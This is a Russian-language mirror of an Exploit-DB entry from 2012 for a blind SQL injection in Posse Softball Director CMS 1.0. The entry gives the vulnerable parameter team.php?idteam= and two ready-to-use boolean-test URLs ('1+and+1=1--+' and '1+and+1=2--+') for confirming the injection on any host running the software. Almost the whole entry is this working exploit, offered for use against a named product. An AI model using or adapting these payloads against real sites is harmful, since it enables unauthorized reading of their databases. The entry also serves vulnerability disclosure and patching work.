- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 18320
- Проверка EDB
-
- Пройдено
- Автор
- EASY LASTER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2012-5291
- Дата публикации
- 2012-01-04
Код:
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-=--=-=--=-.
~ Posse Softball Director CMS Blind SQL Injection Vulnerability team.php ~
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-=--=-=--=-.
[+] Autor: easy laster
[+] Vulnerabilities [Blind SQL Injection ]
[+] Page: www.possesports.com
[+] Language: [ PHP ]
[+] Version: 1.0
[+] Date: 04.01.2012
[+] Status:vulnerable
.-=--=--=--=--=--=--=--=--=--=--=-.
[+] Vulnerability
team.php?idteam=
[+] Exploitable
http://[host]/[path]/team.php?idteam=1+and+1=1--+ #true
http://[host]/[path]/team.php?idteam=1+and+1=2--+ #false- Источник
- www.exploit-db.com
